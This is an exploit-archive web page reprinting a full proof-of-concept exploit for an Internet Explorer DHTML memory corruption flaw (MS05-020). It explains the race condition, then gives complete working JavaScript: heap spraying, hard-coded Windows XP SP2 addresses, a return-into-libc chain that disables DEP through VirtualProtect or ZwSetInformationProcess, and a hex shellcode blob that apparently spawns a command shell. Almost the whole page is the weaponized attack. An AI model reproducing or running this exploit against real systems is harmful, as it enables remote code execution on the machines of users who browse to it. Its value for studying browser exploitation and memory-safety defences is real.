首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Exploiter II version 3.0 DHTML memory corruption proof of concept explo
来源:berendjanwever[at]gmail.com 作者:SkyLined 发布时间:2010-03-02  

------------------internet exploiter 2 v3.0.html-------------------

<HTML><!---------------------------------------------------------------------.
                         __              ___                           __     |
            ?-----.     )/              ) /                          /,?    |
          .'.疮? \   // __      __   / / __  __                   //       |
         ( (_____ ? //  )/ __   )/  / /  )/  )/__     ___     ___//        !
     ___  `-----,痋   /(_,/? )/  //  / /  //  //疮))  ,;疮))  ,;疮)/         :
     ) /        / /  //疮))  //  //  / /  //  //  //  //=='? //  //          .
     '竊-------?? /(  /(  ((__//  / /  /(  /(  /(  ((__,(  ((__/(   __      
    _  ?        )/  / (          ?  ? / /      
    )\_______________________.;'  /   `?-berendjanwever@gmail.com--?(       
 .      ?      
 :                                                                            
 | Internet Exploiter II v3.0 - MS05-20 DHTML memory corruption PoC exploit   
 | New features: Predictable location heap spray, ret-into-libc DEP bypass    
 | Copyright (C) 2003-2005 by Berend-Jan Wever. <berendjanwever@gmail.com>    
 `,__________________________________________________________________________ 
                                                                             `,
  This program is private and not intended for public use or distribution.    |
  It is intended as a proof-of-concept for informational purpose only.        |
  Running, distributing or showing this program without the author's concent  !
  is prohibited. Please contact the author for further information.           !
                                                                              :
  This program is distributed in the hope that it will be useful, but WITHOUT .
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or       
  FITNESS FOR A PARTICULAR PURPOSE.                                           
 ____________________________________________________________________________ 
                                                                             `,
 The vulnerability:                                                           |
   There is a race condition when using DHTML and JavaScript to append an     |
   element created in one window to an element created in another. Using      !
   createComment and appendChild when can force a "dirty" read in createChild :
   which can be exploited to gain control over the process.                   .
   The exact inner workings are unknown to the author, but the appendChild    
   causes a JavaScript error, which seems to be part of the vulnerability.    
                                                                              
 The exploit:                                                                 
   We will put a large number of copies of the "dirty" value we want to read  
   in a string and use this string as the argument in the "createComment"     
   call. The "dirty" value is a pointer to a structure, one of it's members   
   gets used in a jmp. Since the new heap spraying technique alows us to put  
   bytes at predictable locations, we can supply a pointer to a structure we  
   have created on the heap. We will put the structure at 0x08080808 and use  
   this value for the "dirty" read. But since it's a timing issue, it doesn't 
   always work; sometimes we don't control the value when it gets read. In a  
   number of these cases 0x11CF03F9 is used instead (why that value? I dunno).
   We can take advantage of this by supplying the same structure at both      
   0x08080808 and 0x11CF03F9.                                                 
                                                                              
   Throught all this we can now control the jump after the "dirty" read in    
   MSHTML.DLL @ 0x635F6074 (win2ksp4en)                                       
    MOV     EAX, DWORD PTR [ESP+4]  ; EAX = address of "dirty" memory     
    MOV     EAX, DWORD PTR [EAX]    ; EAX = 0x08080808                    
    JMP     NEAR DWORD PTR [EAX+8]  ; JMP [0x08080810]                    
                                                                              
   We have gained control over EIP, but we still need control over ESP for our
   DEP bypassing ret-into-libc to work. We can use the fact that EAX points to
   a structure under our control to load ESP from this structure. All we need 
   to do is ret-into-libc to code that gets ESP from memory pointed to by EAX 
   and the returns or jumps:                                                  
   IEXPLORE.EXE @ 0x00401144                                                  
    XCHG    EAX,ESP     ; ESP = 0x08080808                    
    POP     ESP      ; ESP = [0x08080808] (our new stack)  
    RETN       ; DEP bypassing ret-into-libc         
                                                                              
   We now control EIP and ESP, but we will need to supply our "DEP bypassing  
   ret-into-libc stack" at a known location and store a pointer to it at      
   0x08080808. We'll use 0x11CF2000 to store our stack. Depending on what     
   technique we use to bypass DEP, we might want to store a shellcode at a    
   known location too, we'll use 0x11CF3000 for out shellcode.                
                                                                              
   In short, we need to set up the heap first and put some structures at      
   predictable locations:                                                     
   @ 0x08080808 ("dirty read structure")                                      
       dword    0x11CF2000 (&"ret-into-libc stack")                           
       dword    unused                                                        
       dword    0x00401144                                                    
   @ 0x11CF03F9 ("dirty read structure")                                      
       dword    0x11CF2000 (&"ret-into-libc stack")                           
       dword    unused                                                        
       dword    0x00401144                                                    
   @ 0x11CF2000 ("ret-into-libc stack")                                       
       dword    &"ret-into-libc call 1"                                       
       dword    &"ret-into-libc call 2"                                       
       X dwords "arguments 1"                                                 
       dword    &"ret-into-libc call 3"                                       
       X dwords "arguments 2"                                                 
       ...etc...                                                              
 .     dword    &"ret-into-libc call N"                                       
 :     dword    0x11CF3000 (&"shellcode")                                     
 |     X dwords "arguments N"                                                 
 | @ 0x11CF3000 ("shellcode")                                                 
 |     X bytes  "shellcode"                                                   
 `,__________________________________________________________________________ 
                                                                             `,
 Data Execution Prevention bypass:                                            |
   A number of tricks to bypass Windows Hardware-enforced DEP using           |
   ret-into-libc to specific Windows API calls have been published. This      !
   exploit implements two of them, namely:                                    :
                                                                              .
 ZwSetInformationProcess - Skape & SkyWing                                    
   This technique uses ZwSetInformationProcess to turn of DEP for the entire  
   process. One call to this API causes DEP to be turned off, after which we  
   can return into our shellcode without DEP causing an access violation.     
                                                                              
 VirtualProtect - John Richard Moser, SkyLined                                
   John Richard Moser theorized it would be possible to return into one of the
   Virtual* API calls to turn on the execute bit on a page of memory. I came  
   up with a practical implementation using VirtualProtect that also brute-   
   forces the right memory address for the heap block by making multiple      
   calls. In practice this exploit creates memory blocks with a size of       
 . 0x80000 bytes that all start at an address ending in 0000. We therefore    
 : need 8 calls starting at the guessed addresses and change the address in   
 | steps of 0x10000 bytes. Calls with the wrong address will fail without     
 | further consequence, the one call with the right address will turn on the  
 | execute bit. After these calls, we can return into our shellcode.          
 `.____________________________________________________________________________
-->
 <HEAD>
  <LINK rel="stylesheet" type="text/css" href="/Internet%20Exploiter/style.css"></LINK>
 </HEAD>
 Loading <B>Kernel.js</B>: <SCRIPT src="Kernel.js"></SCRIPT>Ok.<BR>
 Loading <B>Havoc.js</B>: <SCRIPT src="Havoc.js"></SCRIPT>Ok.<BR>
 <SCRIPT>
  /**********************************************************************
  * Magic values                                                        *
  **********************************************************************/
  var iBlockSize = 0x10000; // Heap blocks are aligned to 0xXXXX0000.
  var iPageSize = 0x80000; // Min size to allocate a separate page.

  // This is what we use in the "dirty" read:
  var iAddressOverwrite = 0x08080808;
  // This is where we will expect out block with data:
  // (We will also expect it at 0x08080808)
  var iAddress = 0x11CF0000;
  // Here are some offsets into this block where we store data.
  var iOffsetReAlignStruct1 = 0x03f9; // 0x11CF03F9 (see above).
  var iOffsetReAlignStruct2 = 0x0808; // 0x08080808 is our target.
  // We need to store our ret-into-libc stacks somewhere:
  var iOffsetRetIntoLibC_VirtualProtect = 0x2000;
  var iOffsetRetIntoLibC_ZwSetInformationProcess = 0x2800;
  // We need shellcode somewhere:
  var iOffsetShellcode = 0x3000;
  // VirtualProtect needs to store the old protection flags somewhere:
  var iOffsetOldProtect = 0x4000;
  // ZwSetInformationProcess needs to read the execute flags from
  // somewhere:
  var iOffsetMEM_EXECUTE_OPTION_ENABLE = 0x4000;

  // ret-into-libc hard-coded addresses and values:
  // iexplore.exe
  var iAddressStackHyjack = 0x00401144; // steal ESP
  // kernel32.dll v5.1.2600.2180 (Windows XP SP2)
  var iKernel32_PopEspRet = 0x7C80BCA8; // Unused atm.
  var iKernel32_VirtualProtect = 0x7C801AD0;
  var PAGE_EXECUTE_READWRITE = 0x40;
  // ntdll.dll v5.1.2600.2180 (Windows XP SP2)
  var iNtdll_ZwSetInformationProcess = 0x7C90E62D
  var ProcessExecuteFlags = 0x22
  var MEM_EXECUTE_OPTION_ENABLE = 0x2;  

  var iOffsetRetIntoLibC = iOffsetRetIntoLibC_ZwSetInformationProcess;

        try {
            // We need to have an element in another window, so we try to create
            // one in the window that opened us. This will most likely fail
            // the first time because of XSS restrictions. In that case we open
            // this page in a new window and try again from there.
            oParentElement = opener.document.createComment("");
        } catch(e) {
            // both open() and showHelp() work with this
            window.open(document.location.href);
        }
  if (oParentElement) {
   document.write("<H2>HAVOC</H2>");
   oHavoc = new cHavoc();
   
   /******************************************************************
   * Create DEP bypass ret-into-libc stacks as UNICODE strings       *
   ******************************************************************/
   document.write("<H2>RetIntoLibC (VirtualProtect):</H2>");
   // Is DEP easily evadable? - John Richard Moser
   // http://www.securityfocus.com/archive/1/386958
   var oRetIntoLibC_VirtualProtect = new cRetIntoLibC();
   // Create 8 calls to VirtualProtect with changing addresses to
   // brute force the address of the block that contains our data.
   for (var i = 0; i < iPageSize; i += iBlockSize) {
    oRetIntoLibC_VirtualProtect.RetInto(
     iKernel32_VirtualProtect,
     oHavoc.dwords(
      iAddress-i,
      iPageSize,
      PAGE_EXECUTE_READWRITE,
      iAddress+iOffsetOldProtect
     )
    );
    document.write("VirtualProtect(address = 0x" + IntToHexString(iAddress-i, 32) + ", " +
                   "pagesize = " + IntToHexString(iPageSize, 32) + ", " +
                   "newprotect = " + IntToHexString(PAGE_EXECUTE_READWRITE, 32) + ", " +
                   "&oldprotect = " + IntToHexString(iAddress+iOffsetOldProtect, 32) + ") @ 0x" +
                   IntToHexString(iKernel32_VirtualProtect, 32) + ".<BR>");
   }
   // After we've turned on the execute bit, run the shellcode.
   oRetIntoLibC_VirtualProtect.RetInto(iAddress+iOffsetShellcode);
   document.write("Shellcode() @ 0x" + IntToHexString(iAddress+iOffsetShellcode, 32) + ".<BR>");
   document.write("<BR>");
   var sRetIntoLibC_VirtualProtect = oRetIntoLibC_VirtualProtect.toString();  
   document.write("RetIntoLibC stack is " + IntToBytesString(sRetIntoLibC_VirtualProtect.length << 1) + ".<BR>");


   document.write("<H2>RetIntoLibC (ZwSetInformationProcess):</H2>");
   // Bypassing Windows Hardware-enforced DEP - Skape & SkyWing
   // Uninformed volume 2, article 4 - www.uninformed.org
   // One call to ZwSetInformationProcess to turn off DEP.
   var oRetIntoLibC_ZwSetInformationProcess = new cRetIntoLibC();
   oRetIntoLibC_ZwSetInformationProcess.RetInto(
    iNtdll_ZwSetInformationProcess,
    oHavoc.dwords(
     -1,
     ProcessExecuteFlags,
     iAddress+iOffsetMEM_EXECUTE_OPTION_ENABLE,
     4 // sizeof (DWORD)
    )
   );
   document.write("ZwSetInformationProcess(Handle = -1 (Current Process), " +
                  "ProcessExecuteFlags = " + IntToHexString(ProcessExecuteFlags, 32) + ", " +
                  "&ExecuteFlags = " + IntToHexString(iAddress+iOffsetMEM_EXECUTE_OPTION_ENABLE, 32) + ", " +
                  "sizeof(ExecuteFlags) = 0x4) @ 0x" +
                  IntToHexString(iNtdll_ZwSetInformationProcess, 32) + ".<BR>");
   // After we've turned on the execute bit, run the shellcode.
   oRetIntoLibC_ZwSetInformationProcess.RetInto(iAddress+iOffsetShellcode);
   document.write("Shellcode() @ 0x" + IntToHexString(iAddress+iOffsetShellcode, 32) + ".<BR>");

   document.write("<BR>");
   var sRetIntoLibC_ZwSetInformationProcess = oRetIntoLibC_ZwSetInformationProcess.toString();  
   document.write("RetIntoLibC stack is " + IntToBytesString(sRetIntoLibC_ZwSetInformationProcess.length << 1) + ".<BR>");
 
   /******************************************************************
   * Create shellcode as UNICODE string                              *
   ******************************************************************/
   document.write("<H2>Shellcode:</H2>");
   var sShellcode = oHavoc.hexString(
   "90 90 90 90 eb 43 56 57 8b 45 3c 8b 54 05 78 01 ea 52 8b 52 20 01 " +
   "ea 31 c0 31 c9 41 8b 34 8a 01 ee 31 ff c1 cf 13 ac 01 c7 85 c0 75 " +
   "f6 39 df 75 ea 5a 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 " +
   "8b 01 e8 5f 5e ff e0 fc 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad 8b " +
   "68 08 31 c0 66 b8 6c 6c 50 68 33 32 2e 64 68 77 73 32 5f 54 bb 71 " +
   "a7 e8 fe e8 90 ff ff ff 89 ef 89 c5 81 c4 70 fe ff ff 54 31 c0 fe " +
   "c4 40 50 bb 22 7d ab 7d e8 75 ff ff ff 31 c0 50 50 50 50 40 50 40 " +
   "50 bb a6 55 34 79 e8 61 ff ff ff 89 c6 31 c0 50 50 35 02 01 70 cc " +
   "fe cc 50 89 e0 50 6a 10 50 56 bb 81 b4 2c be e8 42 ff ff ff 31 c0 " +
   "50 56 bb d3 fa 58 9b e8 34 ff ff ff 58 60 6a 10 54 50 56 bb 47 f3 " +
   "56 c6 e8 23 ff ff ff 89 c6 31 db 53 68 2e 63 6d 64 89 e1 41 31 db " +
   "56 56 56 53 53 31 c0 fe c4 40 50 53 53 53 53 53 53 53 53 53 53 6a " +
   "44 89 e0 53 53 53 53 54 50 53 53 53 43 53 4b 53 53 51 53 87 fd bb " +
   "21 d0 05 d0 e8 df fe ff ff 5b 31 c0 48 50 53 bb 43 cb 8d 5f e8 cf " +
   "fe ff ff 56 87 ef bb 12 6b 6d d0 e8 c2 fe ff ff 83 c4 5c 61 eb 89 "
   );
   document.write("Shellcode is " + IntToBytesString(sShellcode.length<<1)+".<BR>");
 
   /******************************************************************
   * Create ret-into-libc exploit struct as UNICODE string           *
   ******************************************************************/
   var sReAlignStruct = oHavoc.dwords(
    iAddress+iOffsetRetIntoLibC,  // sReAlignStruct[0] (Ret-into-libc stack)
    0xCCCCCCCC,    // (unused)
    iAddressStackHyjack  // sReAlignStruct[2] (exploit jmp address)
   );

   /******************************************************************
   * Create a heap block with the strings in the right location      *
   ******************************************************************/
   document.write("<H2>Heap spray:</H2>");
   var sHeap = "";
   document.write("Putting re-aligning struct at offset 0x" + IntToHexString(iOffsetReAlignStruct1, 16) + "...");
   sHeap = oHavoc.fill(sHeap, iOffsetReAlignStruct1-1) + oHavoc.byteShift(sReAlignStruct); //ODD!
   document.write("done.<BR>Putting re-aligning struct at offset 0x" + IntToHexString(iOffsetReAlignStruct2, 16) + "...");
   sHeap = oHavoc.fill(sHeap, iOffsetReAlignStruct2) + sReAlignStruct;
   document.write("done.<BR>Putting RetIntoLibC VirtualProtect at offset 0x" + IntToHexString(iOffsetRetIntoLibC_VirtualProtect, 16) + "...");
   sHeap = oHavoc.fill(sHeap, iOffsetRetIntoLibC_VirtualProtect) + sRetIntoLibC_VirtualProtect;
   document.write("done.<BR>Putting RetIntoLibC ZwSetInformationProcess at offset 0x" + IntToHexString(iOffsetRetIntoLibC_ZwSetInformationProcess, 16) + "...");
   sHeap = oHavoc.fill(sHeap, iOffsetRetIntoLibC_ZwSetInformationProcess) + sRetIntoLibC_ZwSetInformationProcess;
   document.write("done.<BR>Putting Shellcode at offset 0x" + IntToHexString(iOffsetShellcode, 16) + "...");
   sHeap = oHavoc.fill(sHeap, iOffsetShellcode) + sShellcode;
   document.write("done.<BR>Putting MEM_EXECUTE_OPTION_ENABLE (" + IntToHexString(MEM_EXECUTE_OPTION_ENABLE, 32) + ") at offset 0x" + IntToHexString(iOffsetMEM_EXECUTE_OPTION_ENABLE, 16) + "...");
   sHeap = oHavoc.fill(sHeap, iOffsetMEM_EXECUTE_OPTION_ENABLE) + oHavoc.dwords(MEM_EXECUTE_OPTION_ENABLE);
   document.write("done.<BR>");

   /******************************************************************
   * Spray the heap up to and including the target address           *
   ******************************************************************/
   oHavoc.spray(sHeap, iBlockSize, iPageSize, iAddress+iPageSize);

   /******************************************************************
   * HERE BE MONSTERS                                                *
   ******************************************************************/
   document.write("<H2>Exploit:</H2>");

   document.write("Creating exploit string...");
   sAddressOverwrite = oHavoc.dwords(iAddressOverwrite);
   var sMSHTMLHeap = oHavoc.fill("", 0x200, sAddressOverwrite);
   document.write("done.<BR>Creating parent element...");
   var oParentWindow = opener;
            var oParentElement = oParentWindow.document.createComment(sMSHTMLHeap);
   alert();
   document.write("done.<BR>Creating child elements and appending to parent...");
   var oChildWindow = window;
         for(i=0;i<1024;i++) try {
          window.status = sMSHTMLHeap;
          oChildElement = oChildWindow.document.createComment(sMSHTMLHeap)
          window.status = sAddressOverwrite + "Exploiting... " + Math.round(100*i/1024) + "% done.";
          oParentElement.appendChild(oChildElement);
         } catch (e) { }
         window.status = sAddressOverwrite + "Exploiting... failed.";
   //document.write("done.<BR>Closing window...");
   //oChildWindow.close();
   document.write("done.<BR>");
   document.write("Failed!<BR>");
     }
 </SCRIPT>
</HTML>

---------------------------kernel.js-------------------

function IntToHexString(iInt, iBits){
 var sResult = "";
 var iNibbles = Math.ceil(iBits / 4);
 // Remove overflowing
 iInt &= Math.pow(2, iBits+1) - 1;
 while(iNibbles > 0) {
  sResult = ("0123456789ABCDEF").charAt(iInt & 0xF) + sResult;
  iInt >>= 4;
  iNibbles--;
 }
 return sResult.bold();
}
function IntToString(iValue) {
 // Returns a "pretty" string representation of a number:
 //  number(1000000.5) == "1,000,000.5"
 if (iValue == 0) return "0";
 var sResult = "" + iValue;
 
 for (var sResult = ""; iValue > 0; iValue = Math.floor(iValue/1000)) {
  sResult = (iValue % 1000) +
   (sResult.length > 0 ? "," + sResult : "");
  if (iValue > 1000 && sResult.length % 4 < 3)
   sResult = "0" + sResult;
 }
 return sResult.bold();
} // number()

function IntToBytesString(iValue) {
 // Returns a "pretty" string representation of a number of bytes:
 //  bytes(1000000.5) == "976.57 KB"
 var aUnits = new Array(
  "bytes", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB"
    );
    for (var i = 0; iValue > 1024; i++, iValue /= 1024) {}
    sResult =  IntToString(Math.ceil(iValue * 100) / 100) + // Two decimals
     " " + aUnits[i];
 return sResult;
}// bytes()

function IntToTimeString(iValue, iGranularity) {
 // Returns a "pretty" string representation of an elapsed number of
 // milliseconds with the given granularity:
 //  time(1000000.5) == "16m 40s 1祍"
 //  time(1000000.5, 1000) == "16m 40s"
 //  time(1000000.5, 60*1000) == "17m"
 var aUnits = new Array(
  new Array(1000, unescape("%u03BCs")),
  new Array(60, "s"),
  new Array(60, "m"),
  new Array(24, "h"),
  new Array(7, "d"),
  new Array(52, "w"),
  new Array(Infinity, "y")
 );
 var sSign = (iValue < 0 ? "-" : "+");
 iValue = Math.abs(iValue);
 var aResult = new Array();
 if (typeof(iGranularity) == "number")
  iValue = Math.round(iValue / iGranularity) * iGranularity;
 
 for(var i = 0; iValue > 0 && i < aUnits.length; i++) {
  var iSize = aUnits[i][0],
      sUnit = aUnits[i][1],
      iPartialResult = iValue % iSize;
  if (iPartialResult > 0)
   aResult.unshift(Math.round(iPartialResult) + sUnit);
  iValue = Math.floor(iValue / iSize);
 }
 if (aResult.length == 0)
  return "0";
 else
  return sSign + aResult.join(" ");
} // time()

-----------------------havoc.js-------------------------

// Heap Allocating Versatile Object Class

function cHavoc() {
 this.iHeapStartAddress = 0x00000000;
 this.iHeapHeaderSize = 0x20;
 this.iHeapFooterSize = 0x100;
 document.write("Target: ");
 switch (navigator.appName) {
  case "Microsoft Internet Explorer":
   document.write("Microsoft Internet Explorer");
   this.iHeapStartAddress = 0x02800000;
   this.iHeapHeaderSize = 0x24;
   this.iHeapFooterSize = 0x20;
   break;
  case "Netscape":
   switch (navigator.vendor) {
    case "Netscape":
     document.write("Netscape");
     this.iHeapStartAddress = 0x02800000;
     this.iHeapHeaderSize = 0x20;
     this.iHeapFooterSize = 0x20;
     break;
    case "Firefox":
     document.write("FireFox");
     this.iHeapStartAddress = 0x02000000;
     this.iHeapHeaderSize = 0x20;
     this.iHeapFooterSize = 0x20;
     break;
    case "":
     document.write("Mozilla");
     this.iHeapStartAddress = 0x02000000;
     this.iHeapHeaderSize = 0x20;
     this.iHeapFooterSize = 0x20;
     break;
    default:
     document.write("Unknown Mozilla vendor (" + navigator.vendor + ")");
   }
   break;
  default:
   document.write("Unknown (" + navigator.appName + ")");
 }
 document.write("<BR>Heap start address: 0x" + IntToHexString(this.iHeapStartAddress, 32) +
                ", header: " + IntToBytesString(this.iHeapHeaderSize) +
                ", footer: " + IntToBytesString(this.iHeapFooterSize) + ".<BR>");
 this.aHeap = new Array();

 this.dwords = function() {
  sResult = "";
  for (var i = 0; i < arguments.length; i++) {
   sResult += String.fromCharCode(arguments[i] & 0xFFFF) +
              String.fromCharCode((arguments[i] >> 16) & 0xFFFF);
  }
  return sResult;
 }
 this.hexString = function(sString) {
  return unescape(
   sString.replace(
    /(?:\s)*(?:\\\\x|0x)?([0-9A-Fa-f][0-9A-Fa-f])(?:\s)*(?:\\\\x|0x)?([0-9A-Fa-f][0-9A-Fa-f])/g,
    "%u$2$1"
   )
  );
 }
 this.byteShift = function(sShiftee) {
  var iCharCode = 0;
  var sResult = "";
  for (var i = 0; i < sShiftee.length; i++) {
   iByte = sShiftee.charCodeAt(i);
   iCharCode += ((iByte & 0xFF) << 8);
   sResult += String.fromCharCode(iCharCode);
   iCharCode = (iByte >> 8) & 0xFF;
  }
  sResult += String.fromCharCode(iCharCode);
  return sResult;
 }

 this.fill = function(sFillee, iSize, sFiller) {
  if (typeof(sFiller) != "string") sFiller = this.dwords(0);
  var iFillLength = (iSize >> 1) - sFillee.length;
  var iFillerCopies = Math.floor(iFillLength / sFiller.length);
  var sFill = "";
  for (var bit = 31; bit >= 0; bit--) {
   sFill += sFill + ((iFillerCopies & (1 << bit)) != 0 ? sFiller : "");
  }
  var iRemainder = iFillLength - sFill.length;
  var sResult = sFillee + sFill + sFiller.substr(0, iRemainder);
  document.write("(" + (sFillee.length > 0 ? IntToBytesString(sFillee.length<<1) + " original + " : "") +
                 (iFillerCopies > 0 ? IntToString(iFillerCopies) + "x" + IntToBytesString(sFiller.length << 1) + " filler " : "") +
                 (iRemainder > 0 ? "+ " + IntToBytesString(iRemainder) + " remainder " : "") +
                 "= " + IntToBytesString(sResult.length << 1) + ") ");
  return sResult;
 }
 
 this.spray = function(sContent, iBlockSize, iPageSize, iFillToAddress) {
  document.write("Padding content up to 0x" + IntToHexString(iBlockSize, 32) + " bytes to create block...");
  var sBlock = this.fill(sContent, iBlockSize);
  document.write("done.<BR>Copying block to fill 0x" + IntToHexString(iPageSize, 32) + " bytes to create page...");
  var sPage = this.fill("", iPageSize, sBlock);
  var iPageCount = Math.ceil((iFillToAddress - this.iHeapStartAddress) / iPageSize);
  document.write("done.<BR>Creating " + IntToString(iPageCount) + " pages to fill heap up to " +
                 "0x" + IntToHexString(iFillToAddress, 32) + "...");
  for (var i = 0; i < iPageCount; i++) {
   window.status = "Spraying: " + Math.round(100*i/iPageCount) + "% done.";
   this.aHeap.push(
    sPage.substring(this.iHeapHeaderSize >> 1, sPage.length - (this.iHeapFooterSize >> 1))
   );
  }
  var iTotalSize = 0;
  for (var i = 0; i < this.aHeap.length; i++) {
   iTotalSize += this.iHeapHeaderSize + (this.aHeap[i].length<<1) + this.iHeapFooterSize;
  }
  window.status = "Spraying: done, " + IntToBytesString(iTotalSize) + " allocated.";
  document.write("done.<BR>Total allocated memory: " + IntToBytesString(iTotalSize) + ".<BR>");
 }
}

cRetIntoLibC = function() {
 this.aRetAddresses = new Array();
 this.aArguments = new Array();

 this.RetInto = function(iRetAddress, sArguments) {
  this.aRetAddresses.push(oHavoc.dwords(iRetAddress));
  if (typeof(sArguments) != "string") sArguments = "";
  this.aArguments.push(sArguments);
 }
 this.toString = function() {
  var sResult = "";
  for (var i = 0; i < this.aRetAddresses.length; i++) {
   sResult += (this.aRetAddresses[i]);
   if (i > 0) sResult += this.aArguments[i-1];
  }
  sResult += this.aArguments[i-1];
  return sResult;
 }
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy FTP Server version 1.7.0.
·Todd Miller Sudo local root ex
·Windows XP Home Edition SP3 En
·Joomla Component com_liveticke
·iPhone / iTouch FTPDisc 1.0 3
·Safari 4.0.4 (531.21.10) - Sta
·Tod Miller Sudo 1.6.x before 1
·Windows Xp Home Edition SP2 En
·Internet Explorer 'winhlp32.ex
·RCA DCM425 Cable Modem micro_h
·Mozilla Firefox v3.6 and Opera
·Joomla Component com_paxgaller
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved